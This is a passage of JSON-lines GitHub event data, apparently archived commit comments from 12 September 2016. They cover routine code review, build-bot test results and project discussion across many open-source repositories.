it.attack;\r\n\t\t\t\tdefense = it.defense;\r\n\t\t\t\textraDefense = it.extraDefense;\r\n\t\t\t\tshootRange = it.shootRange;\r\n\t\t\t}`\r\n\r\nOr you forgot deleted this?\r\n\r\n`\t\t\tif (shootRange >= 2) {\r\n\t\t\t\tif (begin) {\r\n\t\t\t\t\tbegin = false;\r\n\t\t\t\t\ts << \" (\";\r\n\t\t\t\t} else {\r\n\t\t\t\t\ts << \", \";\r\n\t\t\t\t}\r\n\t\t\t\ts << \"Range:\" << shootRange;\r\n\t\t\t} else {\r\n\t\t\t\ts << \", \";\r\n\t\t\t}`\r\n"}},"created_at":"2016-09-12T21:10:57Z"}
{"id":"4551921616","type":"CommitCommentEvent","actor":{"login":"stephen-phillips-affectiva"},"repo":{"name":"Affectiva/developerportal"},"payload":{"comment":{"id":18991756,"position":null,"line":null,"path":null,"commit_id":"c2f9d435398b4aafeb2f06651a959e1622024f11","created_at":"2016-09-12T21:11:43Z","updated_at":"2016-09-12T21:11:43Z","body":"I've verified with the AffdexMe projects for iOS and OSX that there is no longer a need to add the SDK's support frameworks (e.g. CoreVideo.framework) to the user's Xcode project, so the framework requirements have been removed from these instructions."}},"created_at":"2016-09-12T21:11:43Z"}
{"id":"4551923991","type":"CommitCommentEvent","actor":{"login":"juanzemog"},"repo":{"name":"juanzemog/Prueba1"},"payload":{"comment":{"id":18991765,"position":null,"line":null,"path":null,"commit_id":"fb40f055cae2a525f0d78f6a19878a8fab625b7f","created_at":"2016-09-12T21:12:08Z","updated_at":"2016-09-12T21:12:08Z","body":"1°"}},"created_at":"2016-09-12T21:12:08Z"}
{"id":"4551924175","type":"CommitCommentEvent","actor":{"login":"lougeniaC64"},"repo":{"name":"laurencjay/100daysofcommits"},"payload":{"comment":{"id":18991766,"position":null,"line":null,"path":null,"commit_id":"38f4c38fafd47d499d71295b647cf2f7053bcdf2","created_at":"2016-09-12T21:12:10Z","updated_at":"2016-09-12T21:12:10Z","body":"Lougenia Bailey"}},"created_at":"2016-09-12T21:12:10Z"}
{"id":"4551929193","type":"CommitCommentEvent","actor":{"login":"WJLiddy"},"repo":{"name":"nanflasted/Tableau"},"payload":{"comment":{"id":18991778,"position":null,"line":null,"path":null,"commit_id":"fa50ca5a1dfeb1ebdfd780943235f5e44fcad0b3","created_at":"2016-09-12T21:13:07Z","updated_at":"2016-09-12T21:13:07Z","body":"What are these models licensed under?"}},"created_at":"2016-09-12T21:13:07Z"}
{"id":"4551930618","type":"CommitCommentEvent","actor":{"login":"johnsoza"},"repo":{"name":"C3LX/policies"},"payload":{"comment":{"id":18991782,"position":null,"line":null,"path":null,"commit_id":"ff101b65d26e739f1925eeecf593706b6f47d305","created_at":"2016-09-12T21:13:21Z","updated_at":"2016-09-12T21:13:21Z","body":"C3LXed"}},"created_at":"2016-09-12T21:13:21Z"}
{"id":"4551935952","type":"CommitCommentEvent","actor":{"login":"PriyatelBot"},"repo":{"name":"PriyatelBot/PriyatelBot"},"payload":{"comment":{"id":18991792,"position":null,"line":null,"path":null,"commit_id":"2eb41b87b27365c3074644f6ca07044cdb661bb9","created_at":"2016-09-12T21:14:23Z","updated_at":"2016-09-12T21:14:23Z","body":"Дел"}},"created_at":"2016-09-12T21:14:23Z"}
{"id":"4551937878","type":"CommitCommentEvent","actor":{"login":"hjoliver"},"repo":{"name":"benfitzpatrick/cylc-tutorial"},"payload":{"comment":{"id":18991799,"position":27,"line":107,"path":"advanced-tutorials.tex","commit_id":"c33a88f4956dcd0fc84a6e6852f6eacbc4b9617c","created_at":"2016-09-12T21:14:44Z","updated_at":"2016-09-12T21:14:44Z","body":"This *can be used to* factor out...?"}},"created_at":"2016-09-12T21:14:44Z"}
{"id":"4551941286","type":"CommitCommentEvent","actor":{"login":"kwilliams27"},"repo":{"name":"3dshax/ctr"},"payload":{"comment":{"id":18991805,"position":null,"line":null,"path":null,"commit_id":"bcb3734b9a26d0fe7ef66f7d3814406fee797303","created_at":"2016-09-12T21:15:23Z","updated_at":"2016-09-12T21:15:23Z","body":"Well I'm sorry I tried and I can't help you anymore\n\nOn Monday, September 12, 2016, mcrae1 <notifications@github.com> wrote:\n\n> Well put the date and time on Nintendo 3DS.\n>\n> 2016-09-12 0:54 GMT+02:00 yakesiita <notifications@github.com\n> <javascript:_e(%7B%7D,'cvml','notifications@github.com');>>:\n>\n> > The master keys you send me are incorrect\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/3dshax/ctr/commit/bcb3734b9a26d0fe7ef66f7d381440\n> 6fee797303#commitcomment-18978485>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AT9LYW4XwcHYaE88kVa1MMIPwf3GoTXrks5qpIa-gaJpZM4CClL1>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/3dshax/ctr/commit/bcb3734b9a26d0fe7ef66f7d3814406fee797303#commitcomment-18980314>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATnmKXARrIGbaTq26mKDp7_vMCSx5S-vks5qpPIfgaJpZM4CClL1>\n> .\n>\n"}},"created_at":"2016-09-12T21:15:23Z"}
{"id":"4551949930","type":"CommitCommentEvent","actor":{"login":"Ilshidur"},"repo":{"name":"Ilshidur/lol-item-sets-generator.org"},"payload":{"comment":{"id":18991817,"position":null,"line":null,"path":null,"commit_id":"719dbb7b1275f15604f5af8657a425f332cdcbb2","created_at":"2016-09-12T21:17:02Z","updated_at":"2016-09-12T21:17:02Z","body":"Ok somehow, this code makes the website overload easily ..."}},"created_at":"2016-09-12T21:17:02Z"}
{"id":"4551953952","type":"CommitCommentEvent","actor":{"login":"hashtag-smashtag"},"repo":{"name":"evergage/wh-app-ios"},"payload":{"comment":{"id":18991827,"position":30,"line":186,"path":"SidebarViewController.m","commit_id":"be3df62c67b0d474ecd4c94bfd89528e69e22634","created_at":"2016-09-12T21:17:47Z","updated_at":"2016-09-12T21:17:47Z","body":"this else-block was for the non-search table.. ie the side-bar-menu table ;)"}},"created_at":"2016-09-12T21:17:47Z"}
{"id":"4551954885","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18991828,"position":5,"line":22,"path":"FHEM/14_SD_WS.pm","commit_id":"7c15b54258fef1bb0139322c5804e9fccd873c77","created_at":"2016-09-12T21:17:56Z","updated_at":"2016-09-12T21:17:56Z","body":"Ich hab die Protokoll IDs mit in die Regex aufgenommen.\r\nVielleicht kann man das auch dynamisch anpassen, nachdem das Modul initialisiert wurde. Prinzipiell sollte das möglich sein."}},"created_at":"2016-09-12T21:17:56Z"}
{"id":"4551955524","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18991830,"position":37,"line":118,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"16b7e56cde7784d736fe83f1344028c93bbaf635","created_at":"2016-09-12T21:18:03Z","updated_at":"2016-09-12T21:18:03Z","body":"I would change this `debug!` to say `debug!(\"crate {:?} no longer exists\", new_crate_key)`, I think"}},"created_at":"2016-09-12T21:18:03Z"}
{"id":"4551959281","type":"CommitCommentEvent","actor":{"login":"xconverge"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18991838,"position":38,"line":669,"path":"src/actions/actions.ts","commit_id":"26e358e24b9b0dd05e01b6e7bc2cf6f7f1d73a38","created_at":"2016-09-12T21:18:47Z","updated_at":"2016-09-12T21:18:47Z","body":"@rebornix is this a typo?"}},"created_at":"2016-09-12T21:18:47Z"}
{"id":"4551963049","type":"CommitCommentEvent","actor":{"login":"avel123"},"repo":{"name":"TeoMena98/Calidad"},"payload":{"comment":{"id":18991844,"position":null,"line":null,"path":null,"commit_id":"b6a1cbd8ac941f79ff618282ca8b06bd080c5a6e","created_at":"2016-09-12T21:19:31Z","updated_at":"2016-09-12T21:19:31Z","body":"mena"}},"created_at":"2016-09-12T21:19:31Z"}
{"id":"4551963905","type":"CommitCommentEvent","actor":{"login":"eeide"},"repo":{"name":"csmith-project/creduce"},"payload":{"comment":{"id":18991846,"position":null,"line":null,"path":null,"commit_id":"507d5d8b18b58a92a2f2f903b43957c535998eb8","created_at":"2016-09-12T21:19:41Z","updated_at":"2016-09-12T21:19:41Z","body":"This commit looks OK to me."}},"created_at":"2016-09-12T21:19:41Z"}
{"id":"4551965094","type":"CommitCommentEvent","actor":{"login":"tedytefera"},"repo":{"name":"tedytefera/data"},"payload":{"comment":{"id":18991850,"position":null,"line":null,"path":null,"commit_id":"213a38fcf5ade574c0c3245786314b7797cf8c8a","created_at":"2016-09-12T21:19:54Z","updated_at":"2016-09-12T21:19:54Z","body":"Under this graphic is to understanding\tof\tstatistics\tabout\tsocial,\teconomic,\tand\t\r\nenvironmental\tdevelopment gross domestic product, total employment rate, and estimated HIV prevalence. Gapminder contains data for all 192 UN members,"}},"created_at":"2016-09-12T21:19:54Z"}
{"id":"4551965339","type":"CommitCommentEvent","actor":{"login":"wnwnzhou"},"repo":{"name":"angular/material"},"payload":{"comment":{"id":18991852,"position":null,"line":null,"path":null,"commit_id":"314aae1c345635f3ec1f67c842a38e19ee49b01e","created_at":"2016-09-12T21:19:57Z","updated_at":"2016-09-12T21:19:57Z","body":"@topherfangio Many thanks! Also the individual md-chip has the aria-hidden=\"true\" applied.\r\nCan we have a way to opt-out the aria-hidden, or remove it if not needed?"}},"created_at":"2016-09-12T21:19:57Z"}
{"id":"4551973325","type":"CommitCommentEvent","actor":{"login":"andreineculau"},"repo":{"name":"for-GET/jesse"},"payload":{"comment":{"id":18991870,"position":8,"line":214,"path":"src/jesse_validator_draft3.erl","commit_id":"a1ab58c42b98152d7b61730d0a456c1bb5c1a29a","created_at":"2016-09-12T21:21:29Z","updated_at":"2016-09-12T21:21:29Z","body":"thanks for bringing this up. I think actually the second arg, should only match when Attrs = [] as per the JSON Schema spec, smth like\r\n\r\n```erlang\r\ncheck_value(Value, [{?REF, RefSchemaURI}], State) ->\r\n  NewState = resolve_ref(Value, RefSchemaURI, State),\r\n  undo_resolve_ref(NewState2, State);\r\ncheck_value(Value, [{?REF, _}, _], State) ->\r\n  ... this is an error ...;\r\n```\r\n\r\ndo you have the time/will to send a PR ?"}},"created_at":"2016-09-12T21:21:29Z"}
{"id":"4551973534","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"fortunejs/fortune"},"payload":{"comment":{"id":18991874,"position":null,"line":null,"path":null,"commit_id":"27ad55522c95f8cc7d04ad01aba6492c7c0bfe4c","created_at":"2016-09-12T21:21:31Z","updated_at":"2016-09-12T21:21:31Z","body":"Good stuff 👍"}},"created_at":"2016-09-12T21:21:31Z"}
{"id":"4551974194","type":"CommitCommentEvent","actor":{"login":"cramja"},"repo":{"name":"apache/incubator-quickstep"},"payload":{"comment":{"id":18991876,"position":null,"line":null,"path":null,"commit_id":"cc479336efde3e576077d9a9821a161a2b1878a2","created_at":"2016-09-12T21:21:39Z","updated_at":"2016-09-12T21:21:39Z","body":"@navsan this is the correct branch to work off of, correct?"}},"created_at":"2016-09-12T21:21:39Z"}
{"id":"4551975111","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18991879,"position":null,"line":null,"path":null,"commit_id":"7c1dc8bcd5df1ace4b591d7e161f1fce6032db15","created_at":"2016-09-12T21:21:50Z","updated_at":"2016-09-12T21:21:50Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2300 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c1dc8bcd5df1ace4b591d7e161f1fce6032db15-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c1dc8bcd5df1ace4b591d7e161f1fce6032db15-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.27%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T21:21:50Z"}
{"id":"4551977580","type":"CommitCommentEvent","actor":{"login":"kurtommy"},"repo":{"name":"volumio/Volumio2-UI"},"payload":{"comment":{"id":18991884,"position":13,"line":64,"path":"src/app/plugin/core-plugin/wifi-plugin.html","commit_id":"f6d84e522a874f1eebb526c9857602b243a10ab7","created_at":"2016-09-12T21:22:19Z","updated_at":"2016-09-12T21:22:19Z","body":"<span class=\"hidden-xs\">Connect</span>"}},"created_at":"2016-09-12T21:22:19Z"}
{"id":"4551977688","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":18991885,"position":null,"line":null,"path":null,"commit_id":"9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5","created_at":"2016-09-12T21:22:21Z","updated_at":"2016-09-12T21:22:21Z","body":"@ekg what does a DFS mean on `Node*`s and not `NodeTraversal`s? This looks to be just following all the edges in a from->to direction, irrespective of whether those edges are actually attached to the start or end of the node. So you can start at a node and eventually reach nodes that you can't thread a proper alternating-nodes-and-edges path to.\r\n\r\nThere's also the case where a node that is topologically upstream gets visited later, because the root loop got to one of its children first.\r\n\r\nI think this dfs thing is the root cause of a problem I'm having with is_acyclic, where it thinks that a graph with a cycle between two nodes of a normal from->to edge and a from_start, to_end edge is acyclic, depending on the ID order of the nodes."}},"created_at":"2016-09-12T21:22:21Z"}
{"id":"4551977803","type":"CommitCommentEvent","actor":{"login":"jaseonline"},"repo":{"name":"anchorcms/anchor-cms"},"payload":{"comment":{"id":18991886,"position":null,"line":null,"path":null,"commit_id":"82f20d39ab29c30cbb8c9f593b9bb74a83330969","created_at":"2016-09-12T21:22:22Z","updated_at":"2016-09-12T21:22:22Z","body":"I want to contribute to the development of AnchorCMS. I have cloned it, fixed a few bug, but whenever I Pull/Push/Commit, I either get an Access Denied error - or in the case of a Commit, nothing happens at all. Can you please add me to the list of Contributors - or is that something that I can do myself?"}},"created_at":"2016-09-12T21:22:22Z"}
{"id":"4551982706","type":"CommitCommentEvent","actor":{"login":"kurtommy"},"repo":{"name":"volumio/Volumio2-UI"},"payload":{"comment":{"id":18991895,"position":30,"line":103,"path":"src/app/plugin/core-plugin/wifi-plugin.html","commit_id":"f6d84e522a874f1eebb526c9857602b243a10ab7","created_at":"2016-09-12T21:23:20Z","updated_at":"2016-09-12T21:23:20Z","body":"@volumio placeholder=\"Network Name\" (save CPU)"}},"created_at":"2016-09-12T21:23:20Z"}
{"id":"4551983405","type":"CommitCommentEvent","actor":{"login":"pschichtel"},"repo":{"name":"CubeEngine/core"},"payload":{"comment":{"id":18991898,"position":5,"line":213,"path":"libcube/src/main/java/org/cubeengine/libcube/service/command/CubeCommandManager.java","commit_id":"cc1297e1f1e249df3ebeecb288516376b34e2f64","created_at":"2016-09-12T21:23:28Z","updated_at":"2016-09-12T21:23:28Z","body":"extract to constant maybe?"}},"created_at":"2016-09-12T21:23:28Z"}
{"id":"4551983726","type":"CommitCommentEvent","actor":{"login":"kurtommy"},"repo":{"name":"volumio/Volumio2-UI"},"payload":{"comment":{"id":18991901,"position":39,"line":118,"path":"src/app/plugin/core-plugin/wifi-plugin.html","commit_id":"f6d84e522a874f1eebb526c9857602b243a10ab7","created_at":"2016-09-12T21:23:32Z","updated_at":"2016-09-12T21:23:32Z","body":"same as above"}},"created_at":"2016-09-12T21:23:32Z"}
{"id":"4551990990","type":"CommitCommentEvent","actor":{"login":"danielinux"},"repo":{"name":"akanouras/pepsal"},"payload":{"comment":{"id":18991917,"position":null,"line":null,"path":null,"commit_id":"6f6d33e60b539c9af57b62e7a7c3577838ff4cc6","created_at":"2016-09-12T21:24:58Z","updated_at":"2016-09-12T21:24:58Z","body":"packing the structure represents a performance issue. I would rather go for the memset as suggested in the original bug report."}},"created_at":"2016-09-12T21:24:58Z"}
{"id":"4551991012","type":"CommitCommentEvent","actor":{"login":"DerOrakel"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18991918,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-12T21:24:59Z","updated_at":"2016-09-12T21:24:59Z","body":"There is  only reset in the betaflight advanced menu."}},"created_at":"2016-09-12T21:24:59Z"}
{"id":"4551994382","type":"CommitCommentEvent","actor":{"login":"andreineculau"},"repo":{"name":"for-GET/jesse"},"payload":{"comment":{"id":18991926,"position":8,"line":214,"path":"src/jesse_validator_draft3.erl","commit_id":"a1ab58c42b98152d7b61730d0a456c1bb5c1a29a","created_at":"2016-09-12T21:25:40Z","updated_at":"2016-09-12T21:25:40Z","body":"another way to put it is: the current code works correctly, if the schema follows the spec"}},"created_at":"2016-09-12T21:25:40Z"}
{"id":"4551995965","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18991930,"position":null,"line":null,"path":null,"commit_id":"0e6bb3e3e5983d88a9cf0efc9a22ea6f17af9395","created_at":"2016-09-12T21:25:59Z","updated_at":"2016-09-12T21:25:59Z","body":"saw approval from nickelization\nat https://github.com/basho/riak_kv/commit/0e6bb3e3e5983d88a9cf0efc9a22ea6f17af9395"}},"created_at":"2016-09-12T21:25:59Z"}
{"id":"4551996000","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18991931,"position":null,"line":null,"path":null,"commit_id":"0e6bb3e3e5983d88a9cf0efc9a22ea6f17af9395","created_at":"2016-09-12T21:25:59Z","updated_at":"2016-09-12T21:25:59Z","body":"merging basho/riak_kv/feature-bjs-aae-hashing-v0 = 0e6bb3e3 into borshop-integration-1473-feature-bjs-aae-hashing-v0"}},"created_at":"2016-09-12T21:25:59Z"}
{"id":"4551996032","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18991932,"position":null,"line":null,"path":null,"commit_id":"0e6bb3e3e5983d88a9cf0efc9a22ea6f17af9395","created_at":"2016-09-12T21:26:00Z","updated_at":"2016-09-12T21:26:00Z","body":"basho/riak_kv/feature-bjs-aae-hashing-v0 = 0e6bb3e3 merged ok, testing candidate = 222447c0"}},"created_at":"2016-09-12T21:26:00Z"}
{"id":"4551998796","type":"CommitCommentEvent","actor":{"login":"JLLeitschuh"},"repo":{"name":"angular-ui/bower-ui-grid"},"payload":{"comment":{"id":18991942,"position":16,"line":10,"path":"bower.json","commit_id":"3813e11f2a2f3ffb4eb4d44f642e6176eaa4c285","created_at":"2016-09-12T21:26:33Z","updated_at":"2016-09-12T21:26:33Z","body":"@mportuga "}},"created_at":"2016-09-12T21:26:33Z"}
{"id":"4551999813","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18991944,"position":null,"line":null,"path":null,"commit_id":"76899837c027b7c718b792d2ed1925cf41febf9e","created_at":"2016-09-12T21:26:45Z","updated_at":"2016-09-12T21:26:45Z","body":"++"}},"created_at":"2016-09-12T21:26:45Z"}
{"id":"4552000390","type":"CommitCommentEvent","actor":{"login":"emperorstarfinder"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18991947,"position":null,"line":null,"path":null,"commit_id":"5c01935ef25f9acce2346026853d1aaec952fdb0","created_at":"2016-09-12T21:26:52Z","updated_at":"2016-09-12T21:26:52Z","body":"Hi LifeGold,\r\n\r\nI noticed you had been reporting problems on the WhiteCore-Sim issue tracker relating to issues your finding with WhiteCore-Sim so natural assumption was that you had switched your grid over to use the WhiteCore-Sim as the architecture.  If in fact you are using Virtual Universe for your production grid then its an easy correction to make.  Please keep in mind, while we collaborate with WhiteCore-Sim developers on projects that benefit both of our grids and they are an upstream provider as we have WhiteCore in our base code for Virtual Universe, WhiteCore-Sim and Virtual Universe are two separate architectures.  \r\n\r\nAlso please keep in mind beginning with Virtual Universe Version 1.0.3 we will have features that WhiteCore-Sim will not likely have including terrain hollowing so it will be essential to make sure we know which architecture your using as the platform calls in the viewer will change over time, which could cause problems for users if we don't have the grid manager telling other parts of the viewer code the correct platform to use for compatibility reasons.\r\n\r\n"}},"created_at":"2016-09-12T21:26:52Z"}
{"id":"4552003308","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18991958,"position":null,"line":null,"path":null,"commit_id":"fa53c2e6b49b6422020105b7a496b968b532f572","created_at":"2016-09-12T21:27:28Z","updated_at":"2016-09-12T21:27:28Z","body":"++"}},"created_at":"2016-09-12T21:27:28Z"}
{"id":"4552005686","type":"CommitCommentEvent","actor":{"login":"tsteur"},"repo":{"name":"sgiehl/piwik-plugin-ReferrersManager"},"payload":{"comment":{"id":18991966,"position":5,"line":9,"path":"plugin.json","commit_id":"9d8093d3da9bb6e553f870954eb52628508e59dd","created_at":"2016-09-12T21:27:57Z","updated_at":"2016-09-12T21:27:57Z","body":"FYI: this should be `<4.0.0-b1` see http://developer.piwik.org/guides/migrate-piwik-2-to-3 . Otherwise it might match a 4.0.0-b* and -rc* version"}},"created_at":"2016-09-12T21:27:57Z"}
{"id":"4552007032","type":"CommitCommentEvent","actor":{"login":"nrayann"},"repo":{"name":"nrayann/my-acl"},"payload":{"comment":{"id":18991970,"position":null,"line":null,"path":null,"commit_id":"b66cb1162a6a6fa7ef0809309d8d15096392e5a5","created_at":"2016-09-12T21:28:14Z","updated_at":"2016-09-12T21:28:14Z","body":" CORRECT MESSAGE: Unset other *AROS from acos tree array and fix css and js links. "}},"created_at":"2016-09-12T21:28:14Z"}
{"id":"4552008705","type":"CommitCommentEvent","actor":{"login":"Blystad"},"repo":{"name":"opengapps/aosp_build"},"payload":{"comment":{"id":18991979,"position":null,"line":null,"path":null,"commit_id":"01d7b3020c436211172d805416259d69f6fcf6c4","created_at":"2016-09-12T21:28:33Z","updated_at":"2016-09-12T21:28:33Z","body":"done.\n\nOn Mon, Sep 12, 2016 at 10:50 PM, Adam Farden <notifications@github.com>\nwrote:\n\n> perhaps you should also mention arm64 depends on arm, it's not obvious\n> from the docs\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/opengapps/aosp_build/commit/01d7b3020c436211172d805416259d69f6fcf6c4#commitcomment-18991487>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AATzmo6jPhN-gaP780J7_oy31wG091K3ks5qpbsvgaJpZM4J7BFc>\n> .\n>\n"}},"created_at":"2016-09-12T21:28:33Z"}
{"id":"4552008807","type":"CommitCommentEvent","actor":{"login":"reagentoo"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":18991981,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-12T21:28:35Z","updated_at":"2016-09-12T21:28:35Z","body":"Fixed! But I have not tested the QMPlay2 with Qt4, unfortunately. Also, please tell me, it is possible to use QMPlay2 without libFFmpeg.so module? (As audio player only, for example) If not, Its should to drop ffmpeg flag from ebuild and add ffmpeg hard dependency."}},"created_at":"2016-09-12T21:28:35Z"}
{"id":"4552009280","type":"CommitCommentEvent","actor":{"login":"mrakitin"},"repo":{"name":"radiasoft/devops"},"payload":{"comment":{"id":18991982,"position":null,"line":null,"path":null,"commit_id":"15e8d8e8a23602efbffc63564d86fba82a883eb2","created_at":"2016-09-12T21:28:40Z","updated_at":"2016-09-12T21:28:40Z","body":"Thanks Rob, I changed the config on cpu-001."}},"created_at":"2016-09-12T21:28:40Z"}
{"id":"4552014538","type":"CommitCommentEvent","actor":{"login":"ArsenShnurkov"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":18991997,"position":4,"line":20,"path":"ConEmuWinForms/Util/CommandLineBuilder.cs","commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-12T21:29:43Z","updated_at":"2016-09-12T21:29:43Z","body":"4.6 in it's current source - https://github.com/Microsoft/msbuild/blob/7992abc02c44260f374c1a8cd781a1d13fba17c4/src/nuget/Microsoft.Build.Utilities.Core.nuspec#L25\r\nOne can also create a separate package for CommandLineBuilder (for 4.0 framework, with custom .csproj and .nuspec) which could be reused in both projects."}},"created_at":"2016-09-12T21:29:43Z"}
{"id":"4552015715","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18991999,"position":null,"line":null,"path":null,"commit_id":"37e828c3e016d9c7105e22da76123017a2cdff48","created_at":"2016-09-12T21:29:55Z","updated_at":"2016-09-12T21:29:55Z","body":"Well, even if I disable vmaps, I still get the same thing."}},"created_at":"2016-09-12T21:29:55Z"}
{"id":"4552016855","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18992002,"position":21,"line":104,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"16b7e56cde7784d736fe83f1344028c93bbaf635","created_at":"2016-09-12T21:30:12Z","updated_at":"2016-09-12T21:30:12Z","body":"Nit: just `&tcx.crate_name(krate)` should suffice, no need for the `*`"}},"created_at":"2016-09-12T21:30:12Z"}
{"id":"4552019556","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18992014,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-12T21:30:42Z","updated_at":"2016-09-12T21:30:42Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-MacOS-10.9-clang: OK (2329 of 2329 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-12T21:30:42Z"}
{"id":"4552019870","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18992016,"position":33,"line":114,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"16b7e56cde7784d736fe83f1344028c93bbaf635","created_at":"2016-09-12T21:30:46Z","updated_at":"2016-09-12T21:30:46Z","body":"Nit: I'd prefer `let old_crate_key = make_key(...); ... new_krates.get(&old_crate_key)`"}},"created_at":"2016-09-12T21:30:46Z"}
{"id":"4552021580","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18992020,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-12T21:31:06Z","updated_at":"2016-09-12T21:31:06Z","body":"I just uncommented this to test and satchels kill me fine. It sounds like you had god mode or something else on that overwrote the damage handler.\r\n\r\nBIS_Effects_EH_Killed is an eventhandler added on the vehicle not the player. Whether the player takes damage or not won't affect it firing.\r\n\r\nWhatever issues there are with this we should work out rather than disabling it. Allowing null damage sources gives cheaters an easy way to kill everyone on the server unlogged."}},"created_at":"2016-09-12T21:31:06Z"}
{"id":"4552024499","type":"CommitCommentEvent","actor":{"login":"fgsch"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":18992027,"position":null,"line":null,"path":null,"commit_id":"2761c4362cea5604ff3e27acb5cc1283e503269a","created_at":"2016-09-12T21:31:38Z","updated_at":"2016-09-12T21:31:38Z","body":"Because 1234.abc will be correct with your code and it fails with the\ncurrent code.\n\nAlso strtol() might behave differently depending on the locale.\n\nOn Mon, Sep 12, 2016 at 6:06 PM, Nils Goroll <notifications@github.com>\nwrote:\n\n> I still don't quite understand why you have decided to convert to a float\n> first and then truncate it. This simple change against the previous code\n> seems to do the same and passes your updated vtc:\n>\n> diff --git a/lib/libvmod_std/vmod_std_conversions.c b/lib/libvmod_std/vmod_std_conversions.c\n> index 1506ec9..c3cd45a 100644\n> --- a/lib/libvmod_std/vmod_std_conversions.c\n> +++ b/lib/libvmod_std/vmod_std_conversions.c\n> @@ -120,7 +120,7 @@ vmod_integer(VRT_CTX, VCL_STRING p, VCL_INT i)\n>\n>         r = strtol(p, &e, 0);\n>\n> -       if (e == NULL || *e != '\\0')\n> +       if (e == NULL || (*e != '\\0' && *e != '.'))\n>                 return (i);\n>\n>         return (r);\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/varnishcache/varnish-cache/commit/2761c4362cea5604ff3e27acb5cc1283e503269a#commitcomment-18988154>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAOweRq1tktVnW8mLasi0Za9rdH0jiNNks5qpYZ8gaJpZM4J6zvw>\n> .\n>\n"}},"created_at":"2016-09-12T21:31:38Z"}
